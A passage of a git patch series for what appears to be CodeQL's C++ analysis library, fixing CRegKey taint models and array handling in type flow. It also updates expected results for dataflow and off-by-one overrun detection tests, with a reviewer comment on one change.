@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:801 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:799 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:800 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:800 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:801 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | From 7f87a25768dbd14718079766f91d04b45560abb8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:41:14 +0000 Subject: [PATCH 0929/1267] C++: Fix 'QueryMultiStringValue' model. --- cpp/ql/lib/ext/CRegKey.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 84d85c40a01..a68a360afc0 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -9,7 +9,7 @@ extensions: - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] From 184dfc24b9e199859db493dbd58c59f307d4ac1c Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:42:39 +0000 Subject: [PATCH 0930/1267] C++: Fix 'QueryStringValue' model. --- cpp/ql/lib/ext/CRegKey.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index a68a360afc0..fd13291591d 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml 
@@ -11,7 +11,7 @@ extensions: - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] From 5f33733b6e87f06d155bda4114d8174b0b038c1c Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 14:27:24 +0000 Subject: [PATCH 0931/1267] C++: Fix 'QueryValue' model. --- cpp/ql/lib/ext/CRegKey.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index fd13291591d..6b3da2adfb7 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml 
@@ -14,7 +14,7 @@ extensions: - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file From 8bdd10c0c23ccb3419002fa19f295be465feb4a8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 14:31:17 +0000 Subject: [PATCH 0932/1267] C++: Fix spurious columns in 'CRegKey'. --- cpp/ql/lib/ext/CRegKey.model.yml | 6 +++--- .../dataflow/external-models/validatemodels.expected | 3 +-- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 6b3da2adfb7..1cf2a7d6773 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml 
@@ -15,6 +15,6 @@ extensions: - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file + - ["", "CRegKey", True, "operator HKEY", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CRegKey", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["", "CRegKey", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 423e238ecd7..b2c54e67c2f 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -1,4 +1,5 @@ | Dubious member name "operator BSTR" in summary model. | +| Dubious member name "operator HKEY" in summary model. | | Dubious member name "operator LPCSTR" in summary model. | | Dubious member name "operator LPSAFEARRAY" in summary model. | | Dubious member name "operator LPSTR" in summary model. | 
@@ -44,5 +45,3 @@ | Dubious signature "(size_type,const T &,const Allocator &)" in summary model. | | Dubious signature "(vector &&)" in summary model. | | Dubious signature "(vector &&,const Allocator &)" in summary model. | -| Dubious signature "operator HKEY" in summary model. | -| Dubious signature "operator=" in summary model. | From 9bcdfb6d019cf9f0099805649a1260c982a844ae Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 15:06:22 +0000 Subject: [PATCH 0933/1267] C++: VariableAddressInstructions with array types are not single-object types. --- .../lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll | 7 +++++-- .../dataflow/dataflow-tests/test-source-sink.expected | 1 + cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp | 2 +- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll index 41e30e2902b..df63b547da3 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/TypeFlow.qll @@ -27,8 +27,11 @@ private module Input implements TypeFlowInput { } private predicate hasExactSingleType(Instruction i) { - // The address of a variable is always a single object - i instanceof VariableAddressInstruction + // The address of a variable is always a single object (unless it's an array) + exists(VariableAddressInstruction vai | + i = vai and + not vai.getResultType() instanceof ArrayType + ) or // A reference always points to a single object i.getResultLanguageType().hasUnspecifiedType(any(ReferenceType rt), false) diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected index 6a65ddf952c..fa141b614ea 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected 
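Review bot: The new comment in `hasExactSingleType` says arrays are excluded but not why, and the `exists` wrapper is heavier than the check needs. `getResultType()` is available on `Instruction` itself, so the first disjunct can be written as `(i instanceof VariableAddressInstruction and not i.getResultType() instanceof ArrayType)`. I would also extend the comment along the lines of `// The address of an array variable is also the address of its first element, so pointer arithmetic on it can reach other elements`, which is presumably the reason given the `test_uncertain_array` case updated in the same commit. The predicate's remaining disjuncts continue past the end of the hunk.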
+++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected @@ -326,6 +326,7 @@ irFlow | test.cpp:1069:9:1069:14 | call to source | test.cpp:1081:10:1081:10 | i | | test.cpp:1117:27:1117:34 | call to source | test.cpp:1117:27:1117:34 | call to source | | test.cpp:1132:11:1132:16 | call to source | test.cpp:1121:8:1121:8 | x | +| test.cpp:1138:17:1138:22 | call to source | test.cpp:1140:8:1140:18 | * ... | | true_upon_entry.cpp:9:11:9:16 | call to source | true_upon_entry.cpp:13:8:13:8 | x | | true_upon_entry.cpp:17:11:17:16 | call to source | true_upon_entry.cpp:21:8:21:8 | x | | true_upon_entry.cpp:27:9:27:14 | call to source | true_upon_entry.cpp:29:8:29:8 | x | diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp index 33c714a3139..b138bfb0fba 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp @@ -1137,5 +1137,5 @@ void test_uncertain_array(int n1, int n2) { int data[10]; *(data + 1) = source(); *data = 0; - sink(*(data + 1)); // $ ast=1138:17 ast=1137:7 MISSING: ir + sink(*(data + 1)); // $ ast=1138:17 ast=1137:7 ir } \ No newline at end of file From 0f49ba848de308fd7de80ee4d483e506c64e1925 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 16:04:46 +0000 Subject: [PATCH 0934/1267] C++: Accept test changes. Nothing exciting to see here. --- .../ConstantSizeArrayOffByOne.expected | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index fa7f625210d..eb0212153e8 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected @@ -21,7 +21,11 @@ edges | test.cpp:85:21:85:36 | buf | test.cpp:87:5:87:31 | access to array | provenance | Config | | test.cpp:85:21:85:36 | buf | test.cpp:88:5:88:27 | access to array | provenance | Config | | test.cpp:85:34:85:36 | buf | test.cpp:85:21:85:36 | buf | provenance | | +| test.cpp:92:9:92:11 | definition of arr | test.cpp:96:13:96:18 | access to array | provenance | Config | | test.cpp:96:13:96:15 | arr | test.cpp:96:13:96:18 | access to array | provenance | Config | +| test.cpp:102:9:102:11 | definition of arr | test.cpp:111:17:111:22 | access to array | provenance | Config | +| test.cpp:102:9:102:11 | definition of arr | test.cpp:115:35:115:40 | access to array | provenance | Config | +| test.cpp:102:9:102:11 | definition of arr | test.cpp:119:17:119:22 | access to array | provenance | Config | | test.cpp:111:17:111:19 | arr | test.cpp:111:17:111:22 | access to array | provenance | Config | | test.cpp:111:17:111:19 | arr | test.cpp:115:35:115:40 | access to array | provenance | Config | | test.cpp:111:17:111:19 | arr | test.cpp:119:17:119:22 | access to array | provenance | Config | 
@@ -31,40 +35,54 @@ edges | test.cpp:119:17:119:19 | arr | test.cpp:111:17:111:22 | access to array | provenance | Config | | test.cpp:119:17:119:19 | arr | test.cpp:115:35:115:40 | access to array | provenance | Config | | test.cpp:119:17:119:19 | arr | test.cpp:119:17:119:22 | access to array | provenance | Config | +| test.cpp:125:11:125:13 | definition of arr | test.cpp:128:9:128:14 | access to array | provenance | Config | | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | provenance | Config | | test.cpp:134:25:134:27 | arr | test.cpp:136:9:136:16 | ... += ... | provenance | Config | | test.cpp:136:9:136:16 | ... += ... | test.cpp:136:9:136:16 | ... += ... | provenance | | | test.cpp:136:9:136:16 | ... += ... | test.cpp:138:13:138:15 | arr | provenance | | +| test.cpp:142:10:142:13 | definition of asdf | test.cpp:143:18:143:21 | asdf | provenance | | | test.cpp:143:18:143:21 | asdf | test.cpp:134:25:134:27 | arr | provenance | | | test.cpp:143:18:143:21 | asdf | test.cpp:143:18:143:21 | asdf | provenance | | | test.cpp:146:26:146:26 | *p | test.cpp:147:4:147:9 | -- ... | provenance | | +| test.cpp:154:7:154:9 | definition of buf | test.cpp:156:12:156:18 | ... + ... | provenance | Config | | test.cpp:156:12:156:14 | buf | test.cpp:156:12:156:18 | ... + ... | provenance | Config | | test.cpp:156:12:156:18 | ... + ... | test.cpp:156:12:156:18 | ... + ... | provenance | | | test.cpp:156:12:156:18 | ... + ... | test.cpp:158:17:158:18 | *& ... | provenance | | | test.cpp:158:17:158:18 | *& ... 
| test.cpp:146:26:146:26 | *p | provenance | | +| test.cpp:217:19:217:24 | definition of buffer | test.cpp:218:16:218:28 | buffer | provenance | | | test.cpp:218:16:218:28 | buffer | test.cpp:220:5:220:11 | access to array | provenance | Config | | test.cpp:218:16:218:28 | buffer | test.cpp:221:5:221:11 | access to array | provenance | Config | | test.cpp:218:23:218:28 | buffer | test.cpp:218:16:218:28 | buffer | provenance | | +| test.cpp:228:10:228:14 | definition of array | test.cpp:229:17:229:29 | array | provenance | | | test.cpp:229:17:229:29 | array | test.cpp:231:5:231:10 | access to array | provenance | Config | | test.cpp:229:17:229:29 | array | test.cpp:232:5:232:10 | access to array | provenance | Config | | test.cpp:229:25:229:29 | array | test.cpp:229:17:229:29 | array | provenance | | | test.cpp:245:30:245:30 | p | test.cpp:261:27:261:30 | access to array | provenance | Config | | test.cpp:245:30:245:30 | p | test.cpp:261:27:261:30 | access to array | provenance | Config | +| test.cpp:273:19:273:25 | definition of buffer3 | test.cpp:274:14:274:20 | buffer3 | provenance | | | test.cpp:274:14:274:20 | buffer3 | test.cpp:245:30:245:30 | p | provenance | | | test.cpp:274:14:274:20 | buffer3 | test.cpp:274:14:274:20 | buffer3 | provenance | | | test.cpp:277:35:277:35 | p | test.cpp:278:14:278:14 | p | provenance | | | test.cpp:278:14:278:14 | p | test.cpp:245:30:245:30 | p | provenance | | +| test.cpp:282:19:282:25 | definition of buffer1 | test.cpp:283:19:283:25 | buffer1 | provenance | | | test.cpp:283:19:283:25 | buffer1 | test.cpp:277:35:277:35 | p | provenance | | | test.cpp:283:19:283:25 | buffer1 | test.cpp:283:19:283:25 | buffer1 | provenance | | +| test.cpp:285:19:285:25 | definition of buffer2 | test.cpp:286:19:286:25 | buffer2 | provenance | | | test.cpp:286:19:286:25 | buffer2 | test.cpp:277:35:277:35 | p | provenance | | | test.cpp:286:19:286:25 | buffer2 | test.cpp:286:19:286:25 | buffer2 | provenance | | +| test.cpp:288:19:288:25 | 
definition of buffer3 | test.cpp:289:19:289:25 | buffer3 | provenance | | | test.cpp:289:19:289:25 | buffer3 | test.cpp:277:35:277:35 | p | provenance | | | test.cpp:289:19:289:25 | buffer3 | test.cpp:289:19:289:25 | buffer3 | provenance | | | test.cpp:292:25:292:27 | arr | test.cpp:299:16:299:21 | access to array | provenance | Config | +| test.cpp:305:9:305:12 | definition of arr1 | test.cpp:306:20:306:23 | arr1 | provenance | | | test.cpp:306:20:306:23 | arr1 | test.cpp:292:25:292:27 | arr | provenance | | | test.cpp:306:20:306:23 | arr1 | test.cpp:306:20:306:23 | arr1 | provenance | | +| test.cpp:308:9:308:12 | definition of arr2 | test.cpp:309:20:309:23 | arr2 | provenance | | | test.cpp:309:20:309:23 | arr2 | test.cpp:292:25:292:27 | arr | provenance | | | test.cpp:309:20:309:23 | arr2 | test.cpp:309:20:309:23 | arr2 | provenance | | +| test.cpp:314:10:314:13 | definition of temp | test.cpp:319:19:319:27 | ... + ... | provenance | Config | +| test.cpp:314:10:314:13 | definition of temp | test.cpp:322:19:322:27 | ... + ... | provenance | Config | +| test.cpp:314:10:314:13 | definition of temp | test.cpp:324:23:324:32 | ... + ... | provenance | Config | | test.cpp:319:13:319:27 | ... = ... | test.cpp:325:24:325:26 | end | provenance | | | test.cpp:319:19:319:22 | temp | test.cpp:319:19:319:27 | ... + ... | provenance | Config | | test.cpp:319:19:319:22 | temp | test.cpp:324:23:324:32 | ... + ... | provenance | Config | 
@@ -114,32 +132,39 @@ nodes | test.cpp:85:34:85:36 | buf | semmle.label | buf | | test.cpp:87:5:87:31 | access to array | semmle.label | access to array | | test.cpp:88:5:88:27 | access to array | semmle.label | access to array | +| test.cpp:92:9:92:11 | definition of arr | semmle.label | definition of arr | | test.cpp:96:13:96:15 | arr | semmle.label | arr | | test.cpp:96:13:96:18 | access to array | semmle.label | access to array | +| test.cpp:102:9:102:11 | definition of arr | semmle.label | definition of arr | | test.cpp:111:17:111:19 | arr | semmle.label | arr | | test.cpp:111:17:111:22 | access to array | semmle.label | access to array | | test.cpp:115:35:115:37 | arr | semmle.label | arr | | test.cpp:115:35:115:40 | access to array | semmle.label | access to array | | test.cpp:119:17:119:19 | arr | semmle.label | arr | | test.cpp:119:17:119:22 | access to array | semmle.label | access to array | +| test.cpp:125:11:125:13 | definition of arr | semmle.label | definition of arr | | test.cpp:128:9:128:11 | arr | semmle.label | arr | | test.cpp:128:9:128:14 | access to array | semmle.label | access to array | | test.cpp:134:25:134:27 | arr | semmle.label | arr | | test.cpp:136:9:136:16 | ... += ... | semmle.label | ... += ... | | test.cpp:136:9:136:16 | ... += ... | semmle.label | ... += ... | | test.cpp:138:13:138:15 | arr | semmle.label | arr | +| test.cpp:142:10:142:13 | definition of asdf | semmle.label | definition of asdf | | test.cpp:143:18:143:21 | asdf | semmle.label | asdf | | test.cpp:143:18:143:21 | asdf | semmle.label | asdf | | test.cpp:146:26:146:26 | *p | semmle.label | *p | | test.cpp:147:4:147:9 | -- ... | semmle.label | -- ... | +| test.cpp:154:7:154:9 | definition of buf | semmle.label | definition of buf | | test.cpp:156:12:156:14 | buf | semmle.label | buf | | test.cpp:156:12:156:18 | ... + ... | semmle.label | ... + ... | | test.cpp:156:12:156:18 | ... + ... | semmle.label | ... + ... | | test.cpp:158:17:158:18 | *& ... 
| semmle.label | *& ... | +| test.cpp:217:19:217:24 | definition of buffer | semmle.label | definition of buffer | | test.cpp:218:16:218:28 | buffer | semmle.label | buffer | | test.cpp:218:23:218:28 | buffer | semmle.label | buffer | | test.cpp:220:5:220:11 | access to array | semmle.label | access to array | | test.cpp:221:5:221:11 | access to array | semmle.label | access to array | +| test.cpp:228:10:228:14 | definition of array | semmle.label | definition of array | | test.cpp:229:17:229:29 | array | semmle.label | array | | test.cpp:229:25:229:29 | array | semmle.label | array | | test.cpp:231:5:231:10 | access to array | semmle.label | access to array | 
@@ -147,22 +172,29 @@ nodes | test.cpp:245:30:245:30 | p | semmle.label | p | | test.cpp:245:30:245:30 | p | semmle.label | p | | test.cpp:261:27:261:30 | access to array | semmle.label | access to array | +| test.cpp:273:19:273:25 | definition of buffer3 | semmle.label | definition of buffer3 | | test.cpp:274:14:274:20 | buffer3 | semmle.label | buffer3 | | test.cpp:274:14:274:20 | buffer3 | semmle.label | buffer3 | | test.cpp:277:35:277:35 | p | semmle.label | p | | test.cpp:278:14:278:14 | p | semmle.label | p | +| test.cpp:282:19:282:25 | definition of buffer1 | semmle.label | definition of buffer1 | | test.cpp:283:19:283:25 | buffer1 | semmle.label | buffer1 | | test.cpp:283:19:283:25 | buffer1 | semmle.label | buffer1 | +| test.cpp:285:19:285:25 | definition of buffer2 | semmle.label | definition of buffer2 | | test.cpp:286:19:286:25 | buffer2 | semmle.label | buffer2 | | test.cpp:286:19:286:25 | buffer2 | semmle.label | buffer2 | +| test.cpp:288:19:288:25 | definition of buffer3 | semmle.label | definition of buffer3 | | test.cpp:289:19:289:25 | buffer3 | semmle.label | buffer3 | | test.cpp:289:19:289:25 | buffer3 | semmle.label | buffer3 | | test.cpp:292:25:292:27 | arr | semmle.label | arr | | test.cpp:299:16:299:21 | access to array | semmle.label | access to array | +| test.cpp:305:9:305:12 | definition of arr1 | semmle.label | definition of arr1 | | test.cpp:306:20:306:23 | arr1 | semmle.label | arr1 | | test.cpp:306:20:306:23 | arr1 | semmle.label | arr1 | +| test.cpp:308:9:308:12 | definition of arr2 | semmle.label | definition of arr2 | | test.cpp:309:20:309:23 | arr2 | semmle.label | arr2 | | test.cpp:309:20:309:23 | arr2 | semmle.label | arr2 | +| test.cpp:314:10:314:13 | definition of temp | semmle.label | definition of temp | | test.cpp:319:13:319:27 | ... = ... | semmle.label | ... = ... | | test.cpp:319:19:319:22 | temp | semmle.label | temp | | test.cpp:319:19:319:27 | ... + ... | semmle.label | ... + ... | 
@@ -187,13 +219,23 @@ subpaths | test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | | test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | | test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | +| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:125:11:125:13 | definition of arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | | test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | +| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:142:10:142:13 | definition of asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | | test.cpp:136:9:136:16 | PointerAdd: ... += ... 
| test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:154:7:154:9 | definition of buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | | test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:217:19:217:24 | definition of buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | | test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | +| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:228:10:228:14 | definition of array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... 
| write | | test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | +| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:285:19:285:25 | definition of buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | | test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | +| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:308:9:308:12 | definition of arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | | test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:314:10:314:13 | definition of temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | 